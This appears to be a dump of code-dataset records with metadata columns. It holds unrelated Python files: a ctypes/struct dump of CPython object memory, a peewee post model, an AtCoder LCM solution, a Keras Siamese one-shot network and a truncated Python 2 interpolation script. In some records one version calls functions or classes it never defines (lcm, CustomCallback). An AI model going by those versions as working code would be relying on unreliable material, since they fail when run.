"MIT"
] | null | null | null | Lesson_6/task_5.py | nvv11/algorithms_and_data_structures_in_python | b87f7f618077d1bbf6c71c19845b1eaf62c07240 | [
"MIT"
] | null | null | null | import sys
import ctypes
import struct
a = 59
x = y = a
b = 125.54
c = 'Hello World!'
# --- int: dump the raw CPython object memory of a small int ---
# NOTE(review): every struct format below was sized so that
# struct.calcsize(fmt) == sys.getsizeof(obj) on the author's platform;
# 'L' is a platform-sized C unsigned long, so on builds with a different
# long size struct.unpack raises struct.error — confirm target platform.
print(id(a))
print(sys.getsizeof(a))
print(ctypes.string_at(id(a), sys.getsizeof(a)))
print(struct.unpack('LLLLLLl', ctypes.string_at(id(a), sys.getsizeof(a))))
print(id(int))
print('*' * 50)
# --- float: the trailing 'd' reads 8 bytes as a C double ---
print(id(b))
print(sys.getsizeof(b))
z = b
b = 122.99  # rebinding b before the dump: the bytes printed are for 122.99
print(ctypes.string_at(id(b), sys.getsizeof(b)))
print(struct.unpack('LLLd', ctypes.string_at(id(b), sys.getsizeof(b))))
print(id(float))
print('*' * 50)
# --- str: 13 'c' fields cover the 12 chars of 'Hello World!' plus one byte ---
print(id(c))
print(sys.getsizeof(c))
z = b
b = 122.99
print(ctypes.string_at(id(c), sys.getsizeof(c)))
print(struct.unpack('LLLLLLLLLLli' + 'c' * 13, ctypes.string_at(id(c), sys.getsizeof(c))))
print('*' * 50)
# --- list: header fields followed by per-slot data for the 4 elements ---
lst = [1, 2, 3, 4]
print(struct.unpack('LLLL' + 'L' * 5 * 4, ctypes.string_at(id(lst), sys.getsizeof(lst))))
| 20.35 | 90 | 0.659705 | import sys
import ctypes
import struct
a = 59
x = y = a
b = 125.54
c = 'Hello World!'
# --- int: dump the raw CPython object memory of a small int ---
# NOTE(review): every struct format below was sized so that
# struct.calcsize(fmt) == sys.getsizeof(obj) on the author's platform;
# 'L' is a platform-sized C unsigned long, so on builds with a different
# long size struct.unpack raises struct.error — confirm target platform.
print(id(a))
print(sys.getsizeof(a))
print(ctypes.string_at(id(a), sys.getsizeof(a)))
print(struct.unpack('LLLLLLl', ctypes.string_at(id(a), sys.getsizeof(a))))
print(id(int))
print('*' * 50)
# --- float: the trailing 'd' reads 8 bytes as a C double ---
print(id(b))
print(sys.getsizeof(b))
z = b
b = 122.99  # rebinding b before the dump: the bytes printed are for 122.99
print(ctypes.string_at(id(b), sys.getsizeof(b)))
print(struct.unpack('LLLd', ctypes.string_at(id(b), sys.getsizeof(b))))
print(id(float))
print('*' * 50)
# --- str: 13 'c' fields cover the 12 chars of 'Hello World!' plus one byte ---
print(id(c))
print(sys.getsizeof(c))
z = b
b = 122.99
print(ctypes.string_at(id(c), sys.getsizeof(c)))
print(struct.unpack('LLLLLLLLLLli' + 'c' * 13, ctypes.string_at(id(c), sys.getsizeof(c))))
print('*' * 50)
# --- list: header fields followed by per-slot data for the 4 elements ---
lst = [1, 2, 3, 4]
print(struct.unpack('LLLL' + 'L' * 5 * 4, ctypes.string_at(id(lst), sys.getsizeof(lst))))
| 0 | 0 | 0 |
11ad7fb150c1adc76c00f3f3c606dbf1315ec398 | 679 | py | Python | inscrawler/persistence/entity/post_entity.py | aonurdemir/instagram-crawler | ffb11e3f10ab6ca276fecd4ca527b7661db2704d | [
"MIT"
] | null | null | null | inscrawler/persistence/entity/post_entity.py | aonurdemir/instagram-crawler | ffb11e3f10ab6ca276fecd4ca527b7661db2704d | [
"MIT"
] | null | null | null | inscrawler/persistence/entity/post_entity.py | aonurdemir/instagram-crawler | ffb11e3f10ab6ca276fecd4ca527b7661db2704d | [
"MIT"
] | null | null | null | from peewee import AutoField, TextField, BigIntegerField, BooleanField, ForeignKeyField
from inscrawler.persistence.entity.base_model import BaseModel
from inscrawler.persistence.entity.profile_entity import ProfileEntity
# TODO create indexes
| 32.333333 | 87 | 0.761414 | from peewee import AutoField, TextField, BigIntegerField, BooleanField, ForeignKeyField
from inscrawler.persistence.entity.base_model import BaseModel
from inscrawler.persistence.entity.profile_entity import ProfileEntity
# TODO create indexes
class PostEntity(BaseModel):
    """Peewee ORM model for a crawled post; rows live in the `post` table."""
    id = AutoField(null=False)  # auto-incrementing primary key
    profile = ForeignKeyField(ProfileEntity, null=True)  # owning profile (nullable)
    url = TextField(null=True)  # post URL
    url_imgs = TextField(null=True)  # image URL(s); presumably a serialized list -- TODO confirm format
    post_date = BigIntegerField(null=True)  # publication time; presumably an epoch timestamp -- TODO confirm
    caption = TextField(null=True)  # post caption text
    last_visit = BigIntegerField(null=True)  # last time the crawler visited this post; presumably epoch -- TODO confirm
    created_at = BigIntegerField(null=True)  # row creation time; presumably epoch -- TODO confirm
    deleted = BooleanField(null=True)  # soft-delete flag
    class Meta:
        # Explicit table name instead of peewee's derived default ("postentity").
        table_name = 'post'
| 0 | 410 | 22 |
7d2f42eb86b215815ade249efd60a94bd2c8d53b | 521 | py | Python | arc/arc110/a/main.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
] | 2 | 2022-01-22T07:56:58.000Z | 2022-01-24T00:29:37.000Z | arc/arc110/a/main.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | arc/arc110/a/main.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | import sys
import math
from collections import defaultdict, deque
sys.setrecursionlimit(10 ** 6)
stdin = sys.stdin
INF = float('inf')
MOD = 10 ** 9 + 7
ni = lambda: int(ns())
na = lambda: list(map(int, stdin.readline().split()))
ns = lambda: stdin.readline().strip()
N = ni()
ans = 1
A = []
for i in range(2, N + 1):
A.append(i)
print(lcm(A) + 1) | 18.607143 | 53 | 0.568138 | import sys
import math
from collections import defaultdict, deque
sys.setrecursionlimit(10 ** 6)
stdin = sys.stdin
INF = float('inf')
MOD = 10 ** 9 + 7
ni = lambda: int(ns())
na = lambda: list(map(int, stdin.readline().split()))
ns = lambda: stdin.readline().strip()
def lcm(A):
    """Return the least common multiple of every integer in the list A."""
    result = A[0]
    for value in A[1:]:
        # lcm(a, b) == a * b / gcd(a, b); divide first to keep intermediates small.
        result = result // math.gcd(result, value) * value
    return result
# The answer is the smallest x > 1 with x % k == 1 for every k in 2..N,
# i.e. lcm(2, 3, ..., N) + 1.
# (Removed the unused `ans = 1` and replaced the manual append loop with range().)
N = ni()
A = list(range(2, N + 1))
print(lcm(A) + 1)
58194c56ccba360960350e59665fce422d256866 | 13,281 | py | Python | Siamese.py | sirpuria/DeepScoresExamples | 3b2decb8b295354f7023437144dd0152f1cb8f6a | [
"MIT"
] | null | null | null | Siamese.py | sirpuria/DeepScoresExamples | 3b2decb8b295354f7023437144dd0152f1cb8f6a | [
"MIT"
] | null | null | null | Siamese.py | sirpuria/DeepScoresExamples | 3b2decb8b295354f7023437144dd0152f1cb8f6a | [
"MIT"
] | null | null | null |
import argparse
import sys, os
import imageio
import tensorflow as tf
import Classification_BatchDataset
import TensorflowUtils as utils
import pickle
import time
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Conv2D, MaxPool2D, Dropout, Flatten, Dense, Input, Lambda
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import Accuracy
from tensorflow.keras.optimizers import Adam
from tensorflow.keras import regularizers
from tensorflow.keras.regularizers import l2
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
from sklearn.utils import shuffle
import numpy as np
import numpy.random as rng
FLAGS = None
def loadimgs(path,n = 0):
'''
path => Path of train directory or test directory
'''
X=[]
y = []
cat_dict = {}
lang_dict = {}
curr_y = n
# we load every alphabet seperately so we can isolate them later
for alphabet in os.listdir(path):
print("loading alphabet: " + alphabet)
lang_dict[alphabet] = [curr_y,None]
alphabet_path = os.path.join(path,alphabet)
# every letter/category has it's own column in the array, so load seperately
for letter in os.listdir(alphabet_path):
cat_dict[curr_y] = (alphabet, letter)
category_images=[]
letter_path = os.path.join(alphabet_path, letter)
# read all the images in the current category
dirlist = os.listdir(letter_path)
if len(dirlist)>1:
for filename in dirlist:
image_path = os.path.join(letter_path, filename)
image = imageio.imread(image_path)
category_images.append(image)
# print(len(category_images))
y.append(curr_y)
try:
uu = np.stack(category_images)
X.append(uu)
# edge case - last one
except ValueError as e:
print(e)
print("error - category_images:", category_images)
print(letter)
curr_y += 1
lang_dict[alphabet][1] = curr_y - 1
y = np.vstack(y)
X = np.stack(X)
return X,y,lang_dict
# def initialize_weights(shape, name=None):
# """
# The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
# suggests to initialize CNN layer weights with mean as 0.0 and standard deviation of 0.01
# """
# return tf.random.normal(shape, mean = 0.0, stddev = 0.01)
#
# def initialize_bias(shape, name=None):
# """
# The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
# suggests to initialize CNN layer bias with mean as 0.5 and standard deviation of 0.01
# """
# return tf.random.normal(shape, mean = 0.5, stddev = 0.01)
def get_siamese_model(input_shape):
"""
Model architecture based on the one provided in: http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
"""
# Define the tensors for the two input images
left_input = Input(input_shape)
right_input = Input(input_shape)
initialize_weights = tf.keras.initializers.RandomNormal(mean=0., stddev=0.01)
initialize_bias = tf.keras.initializers.RandomNormal(mean=0.5, stddev=0.01)
# Convolutional Neural Network
model = Sequential([
Conv2D(64, (10,10), activation='relu', input_shape=input_shape,
kernel_initializer=initialize_weights, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(128, (7,7), activation='relu',
kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(128, (4,4), activation='relu', kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(256, (4,4), activation='relu', kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
Flatten(),
Dense(4096, activation='sigmoid',
kernel_regularizer=l2(1e-3),
kernel_initializer=initialize_weights,bias_initializer=initialize_bias)
])
# Generate the encodings (feature vectors) for the two images
encoded_l = model(left_input)
encoded_r = model(right_input)
# Add a customized layer to compute the absolute difference between the encodings
L1_layer = Lambda(lambda tensors:tf.math.abs(tensors[0] - tensors[1]))
L1_distance = L1_layer([encoded_l, encoded_r])
# Add a dense layer with a sigmoid unit to generate the similarity score
prediction = Dense(1,activation='sigmoid',bias_initializer=initialize_bias)(L1_distance)
# Connect the inputs with the outputs
siamese_net = Model(inputs=[left_input,right_input],outputs=prediction)
# return the model
return siamese_net
def get_batch(batch_size,s="train"):
"""Create batch of n pairs, half same class, half different class"""
if s == 'train':
X = Xtrain
categories = train_classes
else:
X = Xval
categories = val_classes
n_classes, n_examples, h, w = X.shape
# randomly sample several classes to use in the batch
categories = rng.choice(n_classes,size=(batch_size,),replace=False)
# initialize 2 empty arrays for the input image batch
pairs=[np.zeros((batch_size, h, w,1)) for i in range(2)]
# initialize vector for the targets
targets=np.zeros((batch_size,))
# make one half of it '1's, so 2nd half of batch has same class
targets[batch_size//2:] = 1
for i in range(batch_size):
category = categories[i]
idx_1 = rng.randint(0, n_examples)
pairs[0][i,:,:,:] = X[category, idx_1].reshape(h, w, 1)
idx_2 = rng.randint(0, n_examples)
# pick images of same class for 1st half, different for 2nd
if i >= batch_size // 2:
category_2 = category
else:
# add a random number to the category modulo n classes to ensure 2nd image has a different category
category_2 = (category + rng.randint(1,n_classes)) % n_classes
pairs[1][i,:,:,:] = X[category_2,idx_2].reshape(h, w,1)
return pairs, targets
def generate(batch_size, s="train"):
"""a generator for batches, so model.fit_generator can be used. """
while True:
pairs, targets = get_batch(batch_size,s)
yield (pairs, targets)
def make_oneshot_task(N, s="val", language=None):
"""Create pairs of test image, support set for testing N way one-shot learning. """
if s == 'train':
X = Xtrain
categories = train_classes
elif s == 'val':
X = Xval
categories = val_classes
else :
X = Xtest2
categories = test2_classes
n_classes, n_examples,h, w = X.shape
indices = rng.randint(0, n_examples,size=(N,))
if language is not None: # if language is specified, select characters for that language
low, high = categories[language]
if N > high - low:
raise ValueError("This language ({}) has less than {} letters".format(language, N))
categories = rng.choice(range(low,high),size=(N,),replace=False)
else: # if no language specified just pick a bunch of random letters
categories = rng.choice(range(n_classes),size=(N,),replace=False)
true_category = categories[0]
ex1, ex2 = rng.choice(n_examples,replace=False,size=(2,))
test_image = np.asarray([X[true_category,ex1,:,:]]*N).reshape(N, h,w,1)
support_set = X[categories,indices,:,:]
support_set[0,:,:] = X[true_category,ex2]
support_set = support_set.reshape(N, h, w,1)
targets = np.zeros((N,))
targets[0] = 1
targets, test_image, support_set = shuffle(targets, test_image, support_set)
pairs = [test_image,support_set]
return pairs, targets
def test_oneshot(model, N, k, s = "val", verbose = 0):
"""Test average N way oneshot learning accuracy of a siamese neural net over k one-shot tasks"""
n_correct = 0
if verbose:
print("Evaluating model on {} random {} way one-shot learning tasks from {} ... \n".format(k,N, s))
for i in range(k):
inputs, targets = make_oneshot_task(N,s)
probs = model.predict(inputs)
if np.argmax(probs) == np.argmax(targets):
n_correct+=1
# else:
# print(targets[np.argmax(targets)])
percent_correct = (100.0 * n_correct / k)
if verbose:
print("Got an average of {}% {} way one-shot learning accuracy \n".format(percent_correct,N))
return percent_correct
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
default='dataset',
help='Directory for storing input data')
parser.add_argument('--batch_size', type=int,
default=128)
parser.add_argument('--epochs', type=int,
default=50)
parser.add_argument('--steps', type=int,
default=1000)
parser.add_argument('-n', default=100, type=int)
FLAGS, unparsed = parser.parse_known_args()
dataset_dir = FLAGS.data_dir
batch_size=FLAGS.batch_size
nperclass = 100
epochs=FLAGS.epochs
steps = FLAGS.steps
# mode=FLAGS.mode
train_dir = os.path.join(dataset_dir, 'train')
validation_dir = os.path.join(dataset_dir, 'validate')
intrain_test_dir = os.path.join(dataset_dir, 'test2')
# classes= os.listdir(train_dir)
model = get_siamese_model((220, 120, 1))
model.summary()
optimizer = Adam(learning_rate=0.00006)
model.compile(loss="binary_crossentropy",optimizer=optimizer)
X,y,c = loadimgs(train_dir)
with open(os.path.join(dataset_dir,"train.pickle"), "wb") as f:
pickle.dump((X,c),f)
Xval,yval,cval=loadimgs(validation_dir)
with open(os.path.join(dataset_dir,"val.pickle"), "wb") as f:
pickle.dump((Xval,cval),f)
Xtest2,ytest2,ctest2=loadimgs(intrain_test_dir)
with open(os.path.join(dataset_dir,"test2.pickle"), "wb") as f:
pickle.dump((Xtest2,ctest2),f)
with open(os.path.join(dataset_dir, "train.pickle"), "rb") as f:
(Xtrain, train_classes) = pickle.load(f)
with open(os.path.join(dataset_dir, "val.pickle"), "rb") as f:
(Xval, val_classes) = pickle.load(f)
with open(os.path.join(dataset_dir, "test2.pickle"), "rb") as f:
(Xtest2, test2_classes) = pickle.load(f)
evaluate_every = 1 # interval for evaluating on one-shot tasks
n_iter = 7500 # No. of training iterations
N_way = 18 # how many classes for testing one-shot tasks
n_val = 200 # how many one-shot tasks to validate on
best = -1
print("Starting training process!")
print("-------------------------------------")
t_start = time.time()
history = model.fit(generate(batch_size, "train"), steps_per_epoch=steps, epochs=epochs, callbacks=[CustomCallback()])
print(history)
# for i in range(1, n_iter+1):
# (inputs,targets) = get_batch(batch_size)
# loss = model.train_on_batch(inputs, targets)
# if i % evaluate_every == 0:
# print("\n ------------- \n")
# print("Time for {0} iterations: {1} mins".format(i, (time.time()-t_start)/60.0))
# print("Train Loss: {0}".format(loss))
# val_acc = test_oneshot(model, N_way, n_val, verbose=True)
# model.save_weights(os.path.join(dataset_dir, 'weights.{}.h5'.format(i)))
# if val_acc >= best:
# print("Current best: {0}, previous best: {1}".format(val_acc, best))
# best = val_acc
| 36.687845 | 122 | 0.629847 |
import argparse
import sys, os
import imageio
import tensorflow as tf
import Classification_BatchDataset
import TensorflowUtils as utils
import pickle
import time
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Conv2D, MaxPool2D, Dropout, Flatten, Dense, Input, Lambda
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import Accuracy
from tensorflow.keras.optimizers import Adam
from tensorflow.keras import regularizers
from tensorflow.keras.regularizers import l2
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
from sklearn.utils import shuffle
import numpy as np
import numpy.random as rng
FLAGS = None
def loadimgs(path,n = 0):
    '''
    path => Path of train directory or test directory

    Walks path/<alphabet>/<letter>/ and loads every image file found.
    Returns (X, y, lang_dict):
      X         -- images stacked per class; the final np.stack assumes every
                   kept class holds the same number of images -- TODO confirm
      y         -- column vector of class ids, one entry per kept class
      lang_dict -- alphabet name -> [first_class_id, last_class_id]
    Class ids start at `n` and advance for every letter directory, including
    ones skipped below for having fewer than two files.
    '''
    X=[]
    y = []
    cat_dict = {}
    lang_dict = {}
    curr_y = n
    # we load every alphabet seperately so we can isolate them later
    for alphabet in os.listdir(path):
        print("loading alphabet: " + alphabet)
        lang_dict[alphabet] = [curr_y,None]
        alphabet_path = os.path.join(path,alphabet)
        # every letter/category has it's own column in the array, so load seperately
        for letter in os.listdir(alphabet_path):
            cat_dict[curr_y] = (alphabet, letter)
            category_images=[]
            letter_path = os.path.join(alphabet_path, letter)
            # read all the images in the current category
            dirlist = os.listdir(letter_path)
            # Skip categories with a single file (presumably so every kept
            # class can form a same-class pair -- TODO confirm intent).
            if len(dirlist)>1:
                for filename in dirlist:
                    image_path = os.path.join(letter_path, filename)
                    image = imageio.imread(image_path)
                    category_images.append(image)
                # print(len(category_images))
                y.append(curr_y)
                try:
                    uu = np.stack(category_images)
                    X.append(uu)
                # edge case - last one
                except ValueError as e:
                    print(e)
                    print("error - category_images:", category_images)
                    print(letter)
            # Class id advances whether or not the class was kept above.
            curr_y += 1
        # Last class id belonging to this alphabet (inclusive).
        lang_dict[alphabet][1] = curr_y - 1
    y = np.vstack(y)
    X = np.stack(X)
    return X,y,lang_dict
# def initialize_weights(shape, name=None):
# """
# The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
# suggests to initialize CNN layer weights with mean as 0.0 and standard deviation of 0.01
# """
# return tf.random.normal(shape, mean = 0.0, stddev = 0.01)
#
# def initialize_bias(shape, name=None):
# """
# The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
# suggests to initialize CNN layer bias with mean as 0.5 and standard deviation of 0.01
# """
# return tf.random.normal(shape, mean = 0.5, stddev = 0.01)
def get_siamese_model(input_shape):
    """
    Build the Siamese network of Koch et al.
    (http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf).

    Two inputs share one convolutional encoder; the component-wise absolute
    difference of their 4096-d embeddings feeds a single sigmoid unit that
    scores the pair's similarity.
    """
    # Weight/bias initializers recommended by the paper.
    weight_init = tf.keras.initializers.RandomNormal(mean=0., stddev=0.01)
    bias_init = tf.keras.initializers.RandomNormal(mean=0.5, stddev=0.01)

    # Shared convolutional encoder (identical weights for both branches).
    encoder = Sequential()
    encoder.add(Conv2D(64, (10, 10), activation='relu', input_shape=input_shape,
                       kernel_initializer=weight_init, kernel_regularizer=l2(2e-4)))
    encoder.add(MaxPool2D())
    encoder.add(Conv2D(128, (7, 7), activation='relu',
                       kernel_initializer=weight_init, bias_initializer=bias_init,
                       kernel_regularizer=l2(2e-4)))
    encoder.add(MaxPool2D())
    encoder.add(Conv2D(128, (4, 4), activation='relu',
                       kernel_initializer=weight_init, bias_initializer=bias_init,
                       kernel_regularizer=l2(2e-4)))
    encoder.add(MaxPool2D())
    encoder.add(Conv2D(256, (4, 4), activation='relu',
                       kernel_initializer=weight_init, bias_initializer=bias_init,
                       kernel_regularizer=l2(2e-4)))
    encoder.add(Flatten())
    encoder.add(Dense(4096, activation='sigmoid', kernel_regularizer=l2(1e-3),
                      kernel_initializer=weight_init, bias_initializer=bias_init))

    left_input = Input(input_shape)
    right_input = Input(input_shape)
    # Component-wise L1 distance between the two embeddings.
    l1_distance = Lambda(lambda pair: tf.math.abs(pair[0] - pair[1]))(
        [encoder(left_input), encoder(right_input)])
    # Single sigmoid unit -> similarity score in (0, 1).
    similarity = Dense(1, activation='sigmoid', bias_initializer=bias_init)(l1_distance)
    return Model(inputs=[left_input, right_input], outputs=similarity)
def get_batch(batch_size, s="train"):
    """Create batch of n pairs, half same class, half different class.

    Draws from the module-level Xtrain/Xval arrays of shape
    (n_classes, n_examples, h, w).  Returns ([left, right], targets) where
    targets[i] == 1 marks a same-class pair: the SECOND half of the batch
    holds same-class pairs, the first half different-class pairs.
    (The original inline comment had the halves swapped.)

    NOTE(review): rng.choice(..., replace=False) requires
    batch_size <= n_classes -- confirm callers respect this.
    """
    # Pick the source split; anything other than 'train' uses validation data.
    if s == 'train':
        X = Xtrain
    else:
        X = Xval
    n_classes, n_examples, h, w = X.shape
    # Sample batch_size distinct classes, one per pair.  (The original also
    # copied train_classes/val_classes into `categories` here, but that value
    # was immediately overwritten -- dead code removed.)
    categories = rng.choice(n_classes, size=(batch_size,), replace=False)
    # Two image stacks: pairs[0] holds the anchors, pairs[1] the comparison images.
    pairs = [np.zeros((batch_size, h, w, 1)) for i in range(2)]
    targets = np.zeros((batch_size,))
    # Second half of the batch gets label 1 (same-class pairs).
    targets[batch_size // 2:] = 1
    for i in range(batch_size):
        category = categories[i]
        idx_1 = rng.randint(0, n_examples)
        pairs[0][i, :, :, :] = X[category, idx_1].reshape(h, w, 1)
        idx_2 = rng.randint(0, n_examples)
        if i >= batch_size // 2:
            category_2 = category
        else:
            # Random non-zero offset modulo n_classes guarantees a different class.
            category_2 = (category + rng.randint(1, n_classes)) % n_classes
        pairs[1][i, :, :, :] = X[category_2, idx_2].reshape(h, w, 1)
    return pairs, targets
def generate(batch_size, s="train"):
    """Yield (pairs, targets) batches forever, for use with model.fit(_generator)."""
    # Endless stream: every next() call samples a fresh batch from split `s`.
    while True:
        yield get_batch(batch_size, s)
def make_oneshot_task(N, s="val", language=None):
    """Create pairs of test image, support set for testing N way one-shot learning. """
    # Select the data split; anything other than 'train'/'val' falls through to test2.
    if s == 'train':
        X = Xtrain
        categories = train_classes
    elif s == 'val':
        X = Xval
        categories = val_classes
    else :
        X = Xtest2
        categories = test2_classes
    n_classes, n_examples,h, w = X.shape
    # One random example index per support-set slot.
    indices = rng.randint(0, n_examples,size=(N,))
    if language is not None: # if language is specified, select characters for that language
        low, high = categories[language]
        if N > high - low:
            raise ValueError("This language ({}) has less than {} letters".format(language, N))
        categories = rng.choice(range(low,high),size=(N,),replace=False)
    else: # if no language specified just pick a bunch of random letters
        categories = rng.choice(range(n_classes),size=(N,),replace=False)
    # The first sampled class is the "true" one; two distinct examples of it
    # become the probe image (ex1) and its match inside the support set (ex2).
    true_category = categories[0]
    ex1, ex2 = rng.choice(n_examples,replace=False,size=(2,))
    test_image = np.asarray([X[true_category,ex1,:,:]]*N).reshape(N, h,w,1)
    support_set = X[categories,indices,:,:]
    # Force slot 0 of the support set to the matching class.
    support_set[0,:,:] = X[true_category,ex2]
    support_set = support_set.reshape(N, h, w,1)
    targets = np.zeros((N,))
    targets[0] = 1
    # Shuffle the three arrays in unison so the match isn't always at index 0.
    targets, test_image, support_set = shuffle(targets, test_image, support_set)
    pairs = [test_image,support_set]
    return pairs, targets
def test_oneshot(model, N, k, s="val", verbose=0):
    """Run k random N-way one-shot trials on split `s` and return accuracy in percent."""
    if verbose:
        print("Evaluating model on {} random {} way one-shot learning tasks from {} ... \n".format(k,N, s))
    hits = 0
    for _ in range(k):
        inputs, targets = make_oneshot_task(N, s)
        scores = model.predict(inputs)
        # A trial counts as correct when the highest-scoring support image is the true match.
        hits += int(np.argmax(scores) == np.argmax(targets))
    accuracy = 100.0 * hits / k
    if verbose:
        print("Got an average of {}% {} way one-shot learning accuracy \n".format(accuracy,N))
    return accuracy
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
default='dataset',
help='Directory for storing input data')
parser.add_argument('--batch_size', type=int,
default=128)
parser.add_argument('--epochs', type=int,
default=50)
parser.add_argument('--steps', type=int,
default=1000)
parser.add_argument('-n', default=100, type=int)
FLAGS, unparsed = parser.parse_known_args()
dataset_dir = FLAGS.data_dir
batch_size=FLAGS.batch_size
nperclass = 100
epochs=FLAGS.epochs
steps = FLAGS.steps
# mode=FLAGS.mode
train_dir = os.path.join(dataset_dir, 'train')
validation_dir = os.path.join(dataset_dir, 'validate')
intrain_test_dir = os.path.join(dataset_dir, 'test2')
# classes= os.listdir(train_dir)
model = get_siamese_model((220, 120, 1))
model.summary()
optimizer = Adam(learning_rate=0.00006)
model.compile(loss="binary_crossentropy",optimizer=optimizer)
X,y,c = loadimgs(train_dir)
with open(os.path.join(dataset_dir,"train.pickle"), "wb") as f:
pickle.dump((X,c),f)
Xval,yval,cval=loadimgs(validation_dir)
with open(os.path.join(dataset_dir,"val.pickle"), "wb") as f:
pickle.dump((Xval,cval),f)
Xtest2,ytest2,ctest2=loadimgs(intrain_test_dir)
with open(os.path.join(dataset_dir,"test2.pickle"), "wb") as f:
pickle.dump((Xtest2,ctest2),f)
with open(os.path.join(dataset_dir, "train.pickle"), "rb") as f:
(Xtrain, train_classes) = pickle.load(f)
with open(os.path.join(dataset_dir, "val.pickle"), "rb") as f:
(Xval, val_classes) = pickle.load(f)
with open(os.path.join(dataset_dir, "test2.pickle"), "rb") as f:
(Xtest2, test2_classes) = pickle.load(f)
evaluate_every = 1 # interval for evaluating on one-shot tasks
n_iter = 7500 # No. of training iterations
N_way = 18 # how many classes for testing one-shot tasks
n_val = 200 # how many one-shot tasks to validate on
best = -1
print("Starting training process!")
print("-------------------------------------")
t_start = time.time()
    class CustomCallback(Callback):
        """Keras callback: after each epoch, score one-shot accuracy on the
        validation and test2 splits and checkpoint weights on improvement."""
        def __init__(self ):
            super(CustomCallback, self).__init__()
            # Best validation one-shot accuracy (percent) seen so far.
            self.best = -1
        def on_epoch_end(self, epoch, logs=None):
            # N for the one-shot task: last class id of the 'musical' alphabet + 1
            # (equals the class count when ids start at 0 -- TODO confirm).
            n1 = val_classes['musical'][1]+1
            keys = list(logs.keys())
            print("End epoch {} of training; got log keys: {}".format(epoch, keys))
            val_acc = test_oneshot(model, n1, n_val, verbose=True)
            print("Accuracy for validation epoch {} is: {}".format(epoch, val_acc))
            # Save weights whenever validation accuracy ties or beats the best so far.
            if val_acc>=self.best:
                self.best = val_acc
                model.save_weights(os.path.join(dataset_dir, 'weights.{}.h5'.format(epoch)))
            nt2 = test2_classes['musical'][1]+1
            test2_acc = test_oneshot(model, nt2, n_val, s="test2", verbose=True)
            print("Accuracy for Test 2 epoch {} is: {}".format(epoch, test2_acc))
        def on_train_end(self, epoch, logs=None):
            # NOTE(review): the Keras Callback API invokes on_train_end(logs) --
            # this extra `epoch` parameter will actually receive the logs dict,
            # so the weights filename below gets a dict repr embedded in it.
            # Confirm intent and align the signature with the Callback API.
            n1 = val_classes['musical'][1]+1
            n2 = test2_classes['musical'][1]+1
            test1_acc = test_oneshot(model, n1, n_val, verbose=True)
            print(test1_acc)
            test2_acc = test_oneshot(model, n2, n_val, s="test2", verbose=True)
            print(test2_acc)
            model.save_weights(os.path.join(dataset_dir, 'weights.{}.h5'.format(epoch)))
history = model.fit(generate(batch_size, "train"), steps_per_epoch=steps, epochs=epochs, callbacks=[CustomCallback()])
print(history)
# for i in range(1, n_iter+1):
# (inputs,targets) = get_batch(batch_size)
# loss = model.train_on_batch(inputs, targets)
# if i % evaluate_every == 0:
# print("\n ------------- \n")
# print("Time for {0} iterations: {1} mins".format(i, (time.time()-t_start)/60.0))
# print("Train Loss: {0}".format(loss))
# val_acc = test_oneshot(model, N_way, n_val, verbose=True)
# model.save_weights(os.path.join(dataset_dir, 'weights.{}.h5'.format(i)))
# if val_acc >= best:
# print("Current best: {0}, previous best: {1}".format(val_acc, best))
# best = val_acc
| 1,213 | 10 | 119 |
52225cc25eab7726008dbc5016cfc8bf8bddd487 | 10,631 | py | Python | intmodels.py | joshfuchs/ZZCeti_fitting | 869c9c260fc11d0a31b00b966af0749006f2d5d5 | [
"MIT"
] | 1 | 2016-12-13T23:36:04.000Z | 2016-12-13T23:36:04.000Z | intmodels.py | joshfuchs/ZZCeti_fitting | 869c9c260fc11d0a31b00b966af0749006f2d5d5 | [
"MIT"
] | null | null | null | intmodels.py | joshfuchs/ZZCeti_fitting | 869c9c260fc11d0a31b00b966af0749006f2d5d5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created March 2015 by JT Fuchs, UNC.
This program interpolates grids of models. It is called by finegrid.py, which contains all the necessary options. Unless you want to change which wavelengths to keep, you shouldn't need to change things here. But keep in mind that interpolation is tricky, you should look at the results carefully.
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.interpolate import RectBivariateSpline
import os
import datetime
| 41.527344 | 297 | 0.617628 | # -*- coding: utf-8 -*-
"""
Created March 2015 by JT Fuchs, UNC.
This program interpolates grids of models. It is called by finegrid.py, which contains all the necessary options. Unless you want to change which wavelengths to keep, you shouldn't need to change things here. But keep in mind that interpolation is tricky, you should look at the results carefully.
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.interpolate import RectBivariateSpline
import os
import datetime
def models(filenames,grid,case,bestt,bestg):
print 'Starting to run intmodels.py'
#Read in model. There are 33 lines of header information before the data starts
# We do not have to integrate over mu because these files already have
tuse = bestt-2500
